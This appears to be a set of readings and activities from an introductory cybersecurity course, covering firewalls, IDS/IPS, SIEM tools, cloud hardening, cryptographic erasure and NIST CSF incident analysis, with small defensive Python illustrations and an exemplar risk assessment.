Take note of where each tool is located on the network. Each tool has its own place in the network’s
architecture. Security analysts are required to understand the network topologies shown in the
diagrams throughout this reading.
Firewall
So far in this course, you learned about stateless firewalls, stateful firewalls, and next-generation
firewalls (NGFWs), and the security advantages of each of them.
Most firewalls are similar in their basic functions. Firewalls allow or block traffic based on a set of rules.
As data packets enter a network, the packet header is inspected and allowed or denied based on its port
number. NGFWs are also able to inspect packet payloads. Each system should have its own firewall,
regardless of the network firewall.
Intrusion Detection System
An intrusion detection system (IDS) is an application that monitors system activity and alerts on possible
intrusions. An IDS alerts administrators based on the signature of malicious traffic.
The IDS is configured to detect known attacks. IDS systems often sniff data packets as they move across
the network and analyze them for the characteristics of known attacks. Some IDS systems review not
only for signatures of known attacks, but also for anomalies that could be the sign of malicious activity.
When the IDS discovers an anomaly, it sends an alert to the network administrator who can then
investigate further.
The limitations to IDS systems are that they can only scan for known attacks or obvious anomalies. New
and sophisticated attacks might not be caught. The other limitation is that the IDS doesn’t stop the
incoming traffic if it detects something awry. It’s up to the network administrator to catch the malicious
activity before it does anything damaging to the network.
When combined with a firewall, an IDS adds another layer of defense. The IDS is placed behind the
firewall and before entering the LAN, which allows the IDS to analyze data streams after network traffic
that is disallowed by the firewall has been filtered out. This is done to reduce noise in IDS alerts, also
referred to as false positives.
Intrusion Prevention System
An intrusion prevention system (IPS) is an application that monitors system activity for intrusive activity
and takes action to stop the activity. It offers even more protection than an IDS because it actively stops
anomalies when they are detected, unlike the IDS that simply reports the anomaly to a network
administrator.
An IPS searches for signatures of known attacks and data anomalies. An IPS reports the anomaly to
security analysts and blocks a specific sender or drops network packets that seem suspect.
The IPS (like an IDS) sits behind the firewall in the network architecture. This offers a high level of
security because risky data streams are disrupted before they even reach sensitive parts of the network.
However, one potential limitation is that it is inline: If it breaks, the connection between the private
network and the internet breaks. Another limitation of IPS is the possibility of false positives, which can
result in legitimate traffic getting dropped.
Full packet capture devices
Full packet capture devices can be incredibly useful for network administrators and security
professionals. These devices allow you to record and analyze all the data that is transmitted over your
network. They also aid in investigating alerts created by an IDS.
Security Information and Event Management
A security information and event management system (SIEM) is an application that collects and analyzes
log data to monitor critical activities in an organization. SIEM tools work in real time to report
suspicious activity in a centralized dashboard. SIEM tools additionally analyze network log data sourced
from IDSs, IPSs, firewalls, VPNs, proxies, and DNS logs. SIEM tools are a way to aggregate security event
data so that it all appears in one place for security analysts to analyze. This is referred to as a single pane
of glass.
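The "single pane of glass" idea can be sketched as aggregating events from several log sources into one prioritized view. The event format and priority scale below are illustrative assumptions for the example, not any particular SIEM's schema.

```python
# Sketch of SIEM-style aggregation: events from multiple sources are
# collected and sorted so high-priority items surface first.
events = [
    {"source": "firewall", "priority": "low",  "message": "blocked port 23"},
    {"source": "IDS",      "priority": "high", "message": "signature match: brute force"},
    {"source": "DNS",      "priority": "low",  "message": "unusual lookup volume"},
]

order = {"high": 0, "medium": 1, "low": 2}
dashboard = sorted(events, key=lambda e: order[e["priority"]])

for event in dashboard:
    print(f"[{event['priority'].upper()}] {event['source']}: {event['message']}")
```

A real SIEM adds correlation rules, retention, and alerting on top of this, but the core value is the same: one prioritized view across many log sources.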
Below, you can review an example of a dashboard from Google Cloud’s SIEM tool, Chronicle. Chronicle is
a cloud-native tool designed to retain, analyze, and search data.
Splunk is another common SIEM tool. Splunk offers different SIEM tool options: Splunk Enterprise and
Splunk Cloud. Both options include detailed dashboards which help security professionals to review and
analyze an organization's data. There are also other similar SIEM tools available, and it's important for
security professionals to research the different tools to determine which one is most beneficial to the
organization.
Devices / Tools: Advantages and Disadvantages

Firewall
● Advantage: A firewall allows or blocks traffic based on a set of rules.
● Disadvantage: A firewall is only able to filter packets based on information provided in the header of the packets.

Intrusion Detection System (IDS)
● Advantage: An IDS detects and alerts admins about possible intrusions, attacks, and other malicious traffic.
● Disadvantage: An IDS can only scan for known attacks or obvious anomalies; new and sophisticated attacks might not be caught. It doesn’t actually stop the incoming traffic.

Intrusion Prevention System (IPS)
● Advantage: An IPS monitors system activity for intrusions and anomalies and takes action to stop them.
● Disadvantage: An IPS is an inline appliance. If it fails, the connection between the private network and the internet breaks. It might detect false positives and block legitimate traffic.

Security Information and Event Management (SIEM)
● Advantage: A SIEM tool collects and analyzes log data from multiple network machines. It aggregates security events for monitoring in a central dashboard.
● Disadvantage: A SIEM tool only reports on possible security issues. It does not take any actions to stop or prevent suspicious events.
A SIEM tool doesn’t replace the expertise of security analysts, or the network- and system-hardening
activities covered in this course; it’s used in combination with other security methods. Security
analysts often work in a Security Operations Center (SOC) where they can monitor the activity across
the network. They can then use their expertise and experience to determine how to respond to the
information on the dashboard and decide when the events meet the criteria to be escalated to oversight.
Key takeaways
Each of these devices or tools cost money to purchase, install, and maintain. An organization might need
to hire additional personnel to monitor the security tools, as in the case of a SIEM. Decision-makers are
tasked with selecting the appropriate level of security based on cost and risk to the organization. You
will learn more about choosing levels of security later in the course.
Activity Overview
In this activity, you will be presented with a scenario about a social media organization that recently
experienced a major data breach caused by undetected vulnerabilities. To address the breach, you will
identify some common network hardening tools that can be implemented to protect the organization’s
overall security. Then, you will select a specific vulnerability that the company has and propose different
network hardening methods. Finally, you will explain how the methods and tools you chose will be
effective for managing the vulnerability and how they will prevent potential breaches in the future.
In the course, you learned network hardening and network security-related hardening practices, such as
port filtering, network access privileges, and encryption over networks. Network hardening practices
help organizations monitor potential threats and attacks on their network and prevent some attacks
from occurring. Some hardening practices are implemented every day, while others are executed every
once in a while, such as every other week or once a month. Understanding how to use network
hardening tools and methods will help you better monitor network activity and protect your
organization’s network against various attacks.
Be sure to complete this activity before moving on. The next course item will provide you with a
completed exemplar to compare to your own work.
Scenario
You are a security analyst working for a social media organization. The organization recently
experienced a major data breach, which compromised the safety of their customers’ personal
information, such as names and addresses. Your organization wants to implement strong network
hardening practices that can be performed consistently to prevent attacks and breaches in the future.
After inspecting the organization’s network, you discover four major vulnerabilities. The four
vulnerabilities are as follows:
1. The organization’s employees share passwords.
2. The admin password for the database is set to the default.
3. The firewalls do not have rules in place to filter traffic coming in and out of the network.
4. Multifactor authentication (MFA) is not used.
If no action is taken to address these vulnerabilities, the organization is at risk of experiencing another
data breach or other attacks in the future.
In this activity, you will write a security risk assessment to analyze the incident and explain what
methods can be used to further secure the network.
Step 1: Access the template
Link to template: Security risk assessment report
Step 2: Access supporting materials
Link to supporting materials: Network hardening tools
Step 3: Select up to three hardening tools and methods to implement
Think about all of the network hardening tools and methods you have learned about in this
course that can protect the organization’s network from future attacks. What hardening
tasks would be the most effective way to respond to this situation? Write your response in
part one of the worksheet.
Step 4: Provide and explain 1-2 recommendations
Recommend one or two security hardening practices to help prevent this from
occurring again in the future. Explain why the security hardening tool or method selected is
effective for addressing the vulnerability. Here are a couple of questions to get you started:
● Why is the recommended security hardening technique effective?
● How often does the hardening technique need to be implemented?
Security risk assessment report
Part 1: Select up to three hardening tools and methods to implement
Three hardening tools the organization can use to address the vulnerabilities found
include:
1. Implementing multi-factor authentication (MFA)
2. Setting and enforcing strong password policies
3. Performing firewall maintenance regularly
MFA requires users to use more than one way to identify and verify their credentials
before accessing an application. Some MFA methods include fingerprint scans, ID cards,
PINs, and passwords.
Password policies can be refined to include rules regarding password length, a list of
acceptable characters, and a disclaimer to discourage password sharing. They can also
include rules surrounding unsuccessful login attempts, such as the user losing access to
the network after five unsuccessful attempts.
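A password policy like the one described can be enforced in code. The sketch below checks length and character rules; the minimum length of 12 and the rule names are illustrative assumptions, not the policy of any particular organization.

```python
import string

# Sketch of enforcing a password policy: length plus character requirements.
MIN_LENGTH = 12  # illustrative threshold

def check_password(password):
    """Return a list of policy violations; an empty list means it passes."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if not any(c in string.ascii_uppercase for c in password):
        problems.append("no uppercase letter")
    if not any(c in string.digits for c in password):
        problems.append("no digit")
    if not any(c in string.punctuation for c in password):
        problems.append("no special character")
    return problems

print(check_password("password"))           # fails all four rules
print(check_password("Str0ng!Passphrase"))  # [] — meets this sketch's policy
```

Rules like the five-attempt lockout mentioned above would be enforced separately at login time rather than when the password is set.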
Firewall maintenance entails checking and updating security configurations regularly to
stay ahead of potential threats.
Part 2: Explain your recommendation(s)
Enforcing multi-factor authentication (MFA) will reduce the likelihood that a malicious
actor can access a network through a brute force or related attack. MFA will also make it
more difficult for people within the organization to share passwords. Identifying and
verifying credentials is especially critical among employees with administrator level
privileges on the network. MFA should be enforced regularly.
Creating and enforcing a password policy within the company will make it increasingly
challenging for malicious actors to access the network. The rules that are included in the
password policy will need to be enforced regularly within the organization to help
increase user security.
Firewall maintenance should happen regularly. Firewall rules should be updated
whenever a security event occurs, especially an event that allows suspicious network
traffic into the network. This measure can be used to protect against various DoS and
DDoS attacks.
Key Takeaways
As a security analyst, you may be responsible for initiating network security practices.
Making executive decisions about which tools to use based on what you know about certain
vulnerabilities will be a starting point for helping the organization improve its network
security. Explaining and documenting your decisions as a cybersecurity analyst will help in
the future if the network ever needs to be troubleshot. It will also help give nontechnical
employees buy-in and help them follow security practices, such as multifactor authentication.
Cloud Hardening
In recent years, many organizations are using network services in the cloud. So in addition to
securing on-premises networks, a security analyst will need to secure cloud networks. In a previous
video, you learned that a cloud network is a collection of servers or computers that stores resources
and data in a remote data center that can be accessed via the internet. They can host company data
and applications using cloud computing to provide on-demand storage, processing power, and data
analytics. Just like regular web servers, cloud servers also require proper maintenance done
through various security hardening procedures. Although cloud servers are hosted by a cloud
service provider, these providers cannot prevent intrusions in the cloud—especially intrusions
from malicious actors, both internal and external to an organization. One distinction between cloud
network hardening and traditional network hardening is the use of a server baseline image for all
server instances stored in the cloud. This allows you to compare data in the cloud servers to the
baseline image to make sure there haven't been any unverified changes. An unverified change could
come from an intrusion in the cloud network. Similar to OS hardening, data and applications on a
cloud network are kept separate depending on their service category. For example, older
applications should be kept separate from newer applications, and software that deals with internal
functions should be kept separate from front-end applications seen by users. Even though the cloud
service provider has a shared responsibility with the organization using their services, there are
still security measures that need to be taken by the organization to make sure their cloud network
is safe. Just like traditional networks, operations in the cloud need to be secured.
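The baseline image comparison described above can be sketched with cryptographic hashes: fingerprint the approved baseline once, then compare each server instance against it. The configuration strings here stand in for real server images, and the function name is an assumption for the example.

```python
import hashlib

# Sketch of a cloud baseline check: hash a server's configuration and
# compare it against the hash of the approved baseline image.
def fingerprint(config):
    """Return a stable SHA-256 fingerprint of a server configuration."""
    return hashlib.sha256(config.encode()).hexdigest()

baseline = fingerprint("sshd: enabled\ntelnet: disabled\n")

# A server matching the baseline raises no alarm...
server_a = fingerprint("sshd: enabled\ntelnet: disabled\n")
print(server_a == baseline)  # True

# ...but an unverified change (telnet re-enabled) is flagged for review.
server_b = fingerprint("sshd: enabled\ntelnet: enabled\n")
print(server_b == baseline)  # False: possible intrusion, investigate
```

Because any change to the configuration changes the hash, even a small unverified modification stands out immediately when compared to the baseline.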
I'm Kelsey, I'm a distinguished engineer at Google Cloud. I work on computer platforms and
security-related topics. When I was starting out, the only jobs I was confident were accessible to
me were fast food jobs. I wanted a career, not just a job. So when I zoomed out and asked myself
what my career options were, I couldn't think of a better place to be in the year 1999 than the
world of technology. I mean, on the news, people
were lining up for the latest operating system. All the tech people were
the new rock stars. And I remember flipping through the job openings in the classified section, and
one ad said: anyone who has one of these certifications, let us know, because we're hiring. The
delta between getting started and landing the first job in the career I always wanted was $35 away
in a certification book. So let's talk about Cloud. So
before the time of Cloud, most companies had their own data center. Imagine it's just you alone in
your house, you can put anything wherever you want. You may choose to never lock the doors on
the inside, it's just you. And for a long time in our industry, that's the way people ran their data
centers. Now, we just call that private Cloud, it's just you there. But Cloud is public. And so the
analogy would be, imagine getting roommates, now you start to think
differently about your stuff. You start to lock things up even while you're inside of the house, and
your security discipline is going to be very different. As more and more companies move into Cloud,
you may just be the person who can help one of those organizations finally make that leap because
they have a professional on their team. All right, so you've gotten the certification, you've gotten the
fundamental skills, how do you make sure that you can use them in the Cloud? I'm going to let you
in on a little secret: go use the Cloud. Go take existing software,
throw it in the Cloud and find all the tools that poke and prod at the thing you just got running and
it's going to tell you where you're weak. Learn those tools because those are the tools that the
professionals use. Learning is a superpower. It gives you the ability to not only get that job that
you've been looking at, but it also gives you the ability to define the next one.
Secure the cloud
Earlier in this course, you were introduced to cloud computing. Cloud computing is a model for allowing
convenient and on-demand network access to a shared pool of configurable computing resources. These
resources can be configured and released with minimal management effort or interaction with the
service provider.
Just like any other IT infrastructure, a cloud infrastructure needs to be secured. This reading will
address some main security considerations that are unique to the cloud and introduce you to the shared
responsibility model used for security in the cloud. Many organizations that use cloud resources and
infrastructure express concerns about the privacy of their data and resources. This concern is addressed
through cryptography and other additional security measures, which will be discussed later in this
course.
Cloud security considerations
Many organizations choose to use cloud services because of the ease of deployment, speed of
deployment, cost savings, and scalability of these options. Cloud computing presents unique security
challenges that cybersecurity analysts need to be aware of.
Identity access management
Identity access management (IAM) is a collection of processes and technologies that helps organizations
manage digital identities in their environment. This service also authorizes how users can use different
cloud resources. A common problem that organizations face when using the cloud is the loose
configuration of cloud user roles. An improperly configured user role increases risk by allowing
unauthorized users to have access to critical cloud operations.
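As a rough sketch of how an analyst might audit for the loose role configuration described above, the example below flags broad roles held by human accounts. The role names, binding schema, and audit rule are hypothetical, not any real CSP's IAM API.

```python
# Minimal sketch: flag cloud user-role bindings that grant broad privileges.
# Role names and the binding schema here are invented for illustration.
PRIVILEGED_ROLES = {"owner", "admin", "editor"}

def audit_role_bindings(bindings):
    """Return (user, role) pairs where a non-service account holds a broad role.

    `bindings` is a list of dicts like {"user": ..., "role": ..., "type": ...}.
    """
    findings = []
    for b in bindings:
        if b["role"] in PRIVILEGED_ROLES and b["type"] != "service-account":
            findings.append((b["user"], b["role"]))
    return findings

bindings = [
    {"user": "alice@example.com", "role": "viewer", "type": "human"},
    {"user": "bob@example.com", "role": "owner", "type": "human"},
]
print(audit_role_bindings(bindings))  # [('bob@example.com', 'owner')]
```

In practice, findings like these feed a least-privilege review: each flagged binding is either justified and documented, or reduced to a narrower role.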
Configuration
The number of available cloud services adds complexity to the network. Each service must be carefully
configured to meet security and compliance requirements. This presents a particular challenge when
organizations perform an initial migration into the cloud. When this change occurs on their network,
they must ensure that every process moved into the cloud has been configured correctly. If network
administrators and architects are not meticulous in correctly configuring the organization’s cloud
services, they could leave the network open to compromise. Misconfigured cloud services are a common
source of cloud security issues.
Attack surface
Cloud service providers (CSPs) offer numerous applications and services for organizations at a low
cost. Every service or application on a network carries its own set of risks and vulnerabilities and
increases an organization’s overall attack surface. An increased attack surface must be compensated for
with increased security measures.
Cloud networks that utilize many services introduce lots of entry points into an organization's
network, and each entry point can be used to introduce malware onto the network or expose other
security vulnerabilities. However, if the network is designed correctly, utilizing several services
does not have to introduce more entry points into an organization's network design. It is also
important to note that CSPs often defer to more secure options, and have undergone more scrutiny
than a traditional on-premises network.
Zero-day attacks
Zero-day attacks are an important security consideration for organizations using cloud or
traditional on-premises network solutions. A zero-day attack is an exploit that was previously
unknown. CSPs are more likely to know about a zero-day attack occurring before a traditional IT
organization does. CSPs have ways of patching hypervisors and migrating workloads to other virtual
machines. These methods ensure the customers are not impacted by the attack. There are also several
tools available for patching at the operating system level that organizations can use.
Zero-day attacks are cyberattacks that target previously unknown vulnerabilities (or "zero-day
vulnerabilities") in software, hardware, or network systems. These vulnerabilities have not been
publicly disclosed, and therefore, there are no patches or fixes available from the software or hardware
vendors. Cybercriminals exploit these vulnerabilities to gain unauthorized access, compromise systems,
steal data, or carry out other malicious activities. Zero-day attacks are particularly dangerous because
they take advantage of security weaknesses for which there are no immediate defenses, giving
organizations little time to respond and protect their systems. Effective cybersecurity practices, such as
regular software updates and vulnerability assessments, are crucial for mitigating the risk of zero-day
attacks.
Visibility and tracking
Network administrators have access to every data packet crossing the network with both on-premise
and cloud networks. They can sniff and inspect data packets to learn about network performance or to
check for possible threats and attacks.
This kind of visibility is also offered in the cloud through flow logs and tools, such as packet mirroring.
CSPs take responsibility for security in the cloud, but they do not allow the organizations that use their
infrastructure to monitor traffic on the CSP’s servers. Many CSPs offer strong security measures to
protect their infrastructure. Still, this situation might be a concern for organizations that are accustomed
to having full access to their network and operations. CSPs pay for third-party audits to verify how
secure a cloud network is and identify potential vulnerabilities. The audits can help organizations
identify whether any vulnerabilities originate from on-premise infrastructure and if there are any
compliance lapses from their CSP.
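As a rough illustration of what analyzing flow logs can look like, the sketch below totals packets per source IP and flags unusually heavy talkers. The record schema and threshold are invented for the example; real CSP flow logs carry many more fields.

```python
from collections import Counter

def flag_noisy_sources(flow_records, threshold=1000):
    """Count packets per source IP in flow-log records and flag heavy talkers.

    Each record is a dict with at least 'src_ip' and 'packets' keys
    (a simplified stand-in for a real CSP flow-log schema).
    """
    totals = Counter()
    for rec in flow_records:
        totals[rec["src_ip"]] += rec["packets"]
    return [ip for ip, count in totals.items() if count > threshold]

# Hypothetical flow-log records:
records = [
    {"src_ip": "10.0.0.5", "packets": 40},
    {"src_ip": "203.0.113.9", "packets": 900},
    {"src_ip": "203.0.113.9", "packets": 600},
]
print(flag_noisy_sources(records))  # ['203.0.113.9']
```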
Things change fast in the cloud
CSPs are large organizations that work hard to stay up-to-date with technology advancements. For
organizations that are used to being in control of any adjustments made to their network, this can be a
potential challenge to keep up with. Cloud service updates can affect security considerations for the
organizations using them. For example, connection configurations might need to be changed based on
the CSP’s updates.
Organizations that use CSPs usually have to update their IT processes. It is possible for organizations to
continue following established best practices for changes, configurations, and other security
considerations. However, an organization might have to adopt a different approach in a way that aligns
with changes made by the CSP.
Cloud networking offers various options that might appear attractive to a small company—options that
they could never afford to build on their own premises. However, it is important to consider that each
service adds complexity to the security profile of the organization, and they will need security personnel
to monitor all of the cloud services.
Shared responsibility model
A commonly accepted cloud security principle is the shared responsibility model. The shared
responsibility model states that the CSP must take responsibility for security involving the cloud
infrastructure, including physical data centers, hypervisors, and host operating systems. The company
using the cloud service is responsible for the assets and processes that they store or operate in the
cloud.
The shared responsibility model ensures that both the CSP and the users agree about where their
responsibility for security begins and ends. A problem occurs when organizations assume that the CSP is
taking care of security that they have not taken responsibility for. One example of this is cloud
applications and configurations. The CSP takes responsibility for securing the cloud, but it is the
organization’s responsibility to ensure that services are configured properly according to the security
requirements of their organization.
Key takeaways
It is essential to know the security considerations that are unique to the cloud and to understand
the shared responsibility model for cloud security. Organizations are responsible for correctly configuring
and maintaining best security practices for their cloud services. The shared responsibility model ensures
that both the CSP and users agree about what the organization is responsible for and what the CSP is
responsible for when securing the cloud infrastructure.
Cryptography and cloud security
Earlier in this course, you were introduced to the concepts of the shared responsibility model and
identity and access management (IAM). Similar to on-premise networks, cloud networks also need to be
secured through a mixture of security hardening practices and cryptography.
This reading will address common cloud security hardening practices, what to consider when
implementing cloud security measures, and the fundamentals of cryptography. Since cloud
infrastructure is becoming increasingly common, it’s important to understand how cloud networks
operate and how to secure them.
Cloud security hardening
There are various techniques and tools that can be used to secure cloud network infrastructure and
resources. Some common cloud security hardening techniques include incorporating IAM, hypervisors,
baselining, cryptography, and cryptographic erasure.
Identity access management (IAM)
Identity access management (IAM) is a collection of processes and technologies that helps organizations
manage digital identities in their environment. This service also authorizes how users can leverage
different cloud resources.
Hypervisors
A hypervisor abstracts the host’s hardware from the operating software environment. There are two
types of hypervisors. Type one hypervisors run on the hardware of the host computer. An example of a
type one hypervisor is VMware's ESXi. Type two hypervisors operate on the software of the host
computer. An example of a type two hypervisor is VirtualBox. Cloud service providers (CSPs) commonly
use type one hypervisors. CSPs are responsible for managing the hypervisor and other virtualization
components. The CSP ensures that cloud resources and cloud environments are available, and it
provides regular patches and updates. Vulnerabilities in hypervisors or misconfigurations can lead to
virtual machine escapes (VM escapes). A VM escape is an exploit where a malicious actor gains access to
the primary hypervisor, potentially the host computer and other VMs. As a CSP customer, you will rarely
deal with hypervisors directly.
Hypervisors are software or hardware-based virtualization technologies that enable the creation and
management of multiple virtual machines (VMs) on a single physical host. There are two primary types
of hypervisors:
1. Type 1 Hypervisor (Bare-Metal Hypervisor): Type 1 hypervisors run directly on the physical
hardware of a server or host system without the need for an underlying operating system. They provide
a lightweight and efficient virtualization solution, ideal for data centers and cloud environments. Type 1
hypervisors allocate resources directly to VMs, ensuring high performance and isolation between VMs.
2. Type 2 Hypervisor (Hosted Hypervisor): Type 2 hypervisors run on top of an existing operating
system as applications. They are typically used for desktop virtualization and development or testing
environments. Type 2 hypervisors are easier to set up but may introduce some performance overhead
because they rely on the host operating system's resources.
In both cases, hypervisors create a layer of abstraction that allows multiple VMs to share the same
physical hardware while remaining isolated from one another. This enables efficient resource
utilization, better hardware consolidation, and the ability to run multiple operating systems and
applications on a single physical server. Hypervisors play a crucial role in modern virtualization and
cloud computing environments.
Baselining
Baselining for cloud networks and operations covers how the cloud environment is configured and set
up. A baseline is a fixed reference point. This reference point can be used to compare changes made to a
cloud environment. Proper configuration and setup can greatly improve the security and performance of
a cloud environment. Examples of establishing a baseline in a cloud environment include: restricting
access to the admin portal of the cloud environment, enabling password management, enabling file
encryption, and enabling threat detection services for SQL databases.
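The baseline checks listed above can be expressed as a simple configuration-drift comparison. This is an illustrative sketch; the setting names are stand-ins, not real CSP configuration keys.

```python
# Sketch: compare a cloud environment's current settings to a documented
# baseline. Setting names here are illustrative, not tied to any specific CSP.
BASELINE = {
    "admin_portal_restricted": True,
    "password_management": True,
    "file_encryption": True,
    "sql_threat_detection": True,
}

def config_drift(current):
    """Return settings whose current value differs from the baseline."""
    return {k: current.get(k) for k, v in BASELINE.items() if current.get(k) != v}

current = {
    "admin_portal_restricted": True,
    "password_management": True,
    "file_encryption": False,     # drifted from the baseline
    "sql_threat_detection": True,
}
print(config_drift(current))  # {'file_encryption': False}
```

An empty result means the environment matches its fixed reference point; anything returned is drift that needs to be verified or reverted.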
Cryptography in the cloud
Cryptography can be applied to secure data that is processed and stored in a cloud environment.
Cryptography uses encryption and secure key management systems to provide data integrity and
confidentiality. Cryptographic encryption is one of the key ways to secure sensitive data and information
in the cloud.
Encryption is the process of scrambling information into ciphertext, which is not readable to anyone
without the encryption key. Encryption primarily originated from manually encoding messages and
information using an algorithm to convert any given letter or number to a new value. Modern
encryption relies on the secrecy of a key, rather than the secrecy of an algorithm. Cryptography is an
important tool that helps secure cloud networks and data at rest to prevent unauthorized access. You’ll
learn more about cryptography in-depth in an upcoming course.
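A classic example of the "convert any given letter to a new value" approach is the Caesar cipher, where the entire secret is the shift amount. The toy sketch below shows why algorithm secrecy alone is weak: anyone who knows the scheme only has to try 25 shifts. Modern encryption instead relies on the secrecy of a large key.

```python
def caesar(text, shift):
    """Shift each letter by `shift` positions; non-letters pass through unchanged."""
    out = []
    for ch in text:
        if ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)

ciphertext = caesar("attack at dawn", 3)
print(ciphertext)              # 'dwwdfn dw gdzq'
print(caesar(ciphertext, -3))  # 'attack at dawn'
```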
Cryptographic erasure
Cryptographic erasure is a method of erasing the encryption key for the encrypted data. When
destroying data in the cloud, more traditional methods of data destruction are not as effective. Crypto-shredding is a newer technique where the cryptographic keys used for decrypting the data are
destroyed. This makes the data undecipherable and prevents anyone from decrypting the data. When
crypto-shredding, all copies of the key need to be destroyed so no one has any opportunity to access the
data in the future.
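Crypto-shredding can be sketched as: keep data only in encrypted form, keep the key in a key store, and destroy the key to render the ciphertext undecipherable. The keystream construction below is a toy stand-in for a real cipher such as AES, and the key-store layout is invented for illustration.

```python
import hashlib
import secrets

def keystream(key, length):
    """Derive a pseudorandom keystream from the key (toy construction,
    not a real cipher -- production systems use AES or similar)."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]

def xor_encrypt(key, data):
    """XOR data with the key-derived keystream; applying it twice decrypts."""
    return bytes(a ^ b for a, b in zip(data, keystream(key, len(data))))

# Encrypt customer data; the key lives only in the key store.
key_store = {"record-42": secrets.token_bytes(32)}
ciphertext = xor_encrypt(key_store["record-42"], b"sensitive customer data")

# Crypto-shredding: destroy every copy of the key...
del key_store["record-42"]
# ...and the ciphertext is now undecipherable: no key, no plaintext.
```

The point of the sketch is the last two lines: once all copies of the key are gone, the data is effectively destroyed even though the ciphertext bytes may still exist on disk.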
Key Management
Modern encryption relies on keeping the encryption keys secure. Below are the measures you can take
to further protect your data when using cloud applications:
● Trusted platform module (TPM). TPM is a computer chip that can securely store passwords,
certificates, and encryption keys.
● Cloud hardware security module (CloudHSM). CloudHSM is a computing device that provides
secure storage for cryptographic keys and processes cryptographic operations, such as
encryption and decryption.
Organizations and customers do not have access to the cloud service provider (CSP) directly, but they
can request audits and security reports by contacting the CSP. Customers typically do not have access to
the specific encryption keys that CSPs use to encrypt the customers’ data. However, almost all CSPs
allow customers to provide their own encryption keys, depending on the service the customer is
accessing. In turn, the customer is responsible for their encryption keys and ensuring the keys remain
confidential. The CSP is limited in how they can help the customer if the customer’s keys are
compromised or destroyed. One key benefit of the shared responsibility model is that the customer is
not entirely responsible for maintenance of the cryptographic infrastructure. Organizations can assess
and monitor the risk involved with allowing the CSP to manage the infrastructure by reviewing a CSP's
audit and security controls. For federal contractors, FedRAMP provides a list of verified CSPs.
Key takeaways
Cloud security hardening is a critical component to consider when assessing the security of various
public cloud environments and improving the security within your organization. Identity access
management (IAM), correctly configuring a baseline for the cloud environment, securing hypervisors,
cryptography, and cryptographic erasure are all methods to use to further secure cloud infrastructure.
Great work on learning about security hardening! You learned about security hardening and its
importance to an organization's infrastructure. First, we discussed how security hardening
strengthens systems and networks to reduce the likelihood of an attack. Next, we covered the
importance of OS hardening, including patch updates, baseline configurations, and hardware and
software disposal. Then we explored network hardening practices, such as network log analysis
and firewall rule maintenance. Finally, we examined cloud network hardening and the
responsibilities of both organizations and cloud service providers in maintaining security. As a
security analyst, you'll be working with operating systems, on-premise networks, and cloud
networks.
Security Hardening
Glossary terms from module 4
Terms and definitions from Course 3, Module 4
Baseline configuration (baseline image): A documented set of specifications within a system that is used
as a basis for future builds, releases, and updates
Hardware: The physical components of a computer
Multi-factor authentication (MFA): A security measure which requires a user to verify their identity in
two or more ways to access a system or network
Network log analysis: The process of examining network logs to identify events of interest
Operating system (OS): The interface between computer hardware and the user
Patch update: A software and operating system update that addresses security vulnerabilities within a
program or product
Penetration testing (pen test): A simulated attack that helps identify vulnerabilities in systems,
networks, websites, applications, and processes
Security hardening: The process of strengthening a system to reduce its vulnerabilities and attack
surface
Security information and event management (SIEM): An application that collects and analyzes log data to
monitor critical activities for an organization
World-writable file: A file that can be altered by anyone in the world
Portfolio Activity: Use the NIST Cybersecurity Framework to respond to a security
incident
Activity Overview
In this activity, you will use the knowledge you’ve gained about networks throughout this
course to analyze a network incident. You will analyze the situation using the National
Institute of Standards and Technology's Cybersecurity Framework (NIST CSF) and create
an incident report that you can include as part of your cybersecurity portfolio
documentation. The CSF is a voluntary framework that consists of standards, guidelines,
and best practices to manage cybersecurity risk. For a refresher, please review this reading
about NIST frameworks and the five functions of the NIST CSF framework. Creating a
quality cybersecurity incident report and applying the CSF can help you build trust and
improve security practices within your organization.
The CSF is scalable and can be applied in a wide variety of contexts. As you continue to
learn more and refine your understanding of key cybersecurity skills, you can use the
templates provided in this activity in other situations. Knowing how to identify which
security measures to apply in response to business needs will help you determine which
are the best available options when it comes to network security.
Be sure to complete this activity before moving on. The next course item will provide you
with a completed exemplar to compare to your own work. It will also provide an
opportunity for you to answer rubric questions that allow you to reflect on key elements of
your incident analysis.
Scenario
Review the scenario below. Then complete the step-by-step instructions.
You are a cybersecurity analyst working for a multimedia company that offers web design
services, graphic design, and social media marketing solutions to small businesses. Your
organization recently experienced a DDoS attack, which compromised the internal network
for two hours until it was resolved.
During the attack, your organization’s network services suddenly stopped responding due
to an incoming flood of ICMP packets. Normal internal network traffic could not access any
network resources. The incident management team responded by blocking incoming ICMP
packets, taking all non-critical network services offline, and restoring critical network
services.
The company’s cybersecurity team then investigated the security event. They found that a
malicious actor had sent a flood of ICMP pings into the company’s network through an
unconfigured firewall. This vulnerability allowed the malicious attacker to overwhelm the
company’s network through a distributed denial of service (DDoS) attack.
To address this security event, the network security team implemented:
● A new firewall rule to limit the rate of incoming ICMP packets
● Source IP address verification on the firewall to check for spoofed IP addresses on incoming
ICMP packets
● Network monitoring software to detect abnormal traffic patterns
● An IDS/IPS system to filter out some ICMP traffic based on suspicious characteristics
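The first mitigation, rate-limiting incoming ICMP packets, is commonly implemented with a token-bucket algorithm. The sketch below is a simplified model of such a firewall rule, not any real firewall's configuration syntax; the rate and capacity values are made up.

```python
class TokenBucket:
    """Allow up to `rate` packets per second, with bursts up to `capacity`."""
    def __init__(self, rate, capacity):
        self.rate = rate
        self.capacity = capacity
        self.tokens = capacity
        self.last = 0.0

    def allow(self, now):
        # Refill tokens based on elapsed time, then spend one if available.
        self.tokens = min(self.capacity, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1:
            self.tokens -= 1
            return True
        return False

bucket = TokenBucket(rate=10, capacity=10)   # e.g. 10 ICMP packets/second
# A flood of 100 packets arriving in the same instant: only the burst passes.
allowed = sum(bucket.allow(now=1.0) for _ in range(100))
print(allowed)  # 10
```

Under normal traffic the bucket refills faster than legitimate pings arrive, so only flood conditions trigger drops.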
As a cybersecurity analyst, you are tasked with using this security event to create a plan to
improve your company’s network security, following the National Institute of Standards
and Technology (NIST) Cybersecurity Framework (CSF). You will use the CSF to help you
navigate through the different steps of analyzing this cybersecurity incident and integrate
your analysis into a general security strategy:
● Identify security risks through regular audits of internal networks, systems, devices,
and access privileges to identify potential gaps in security.
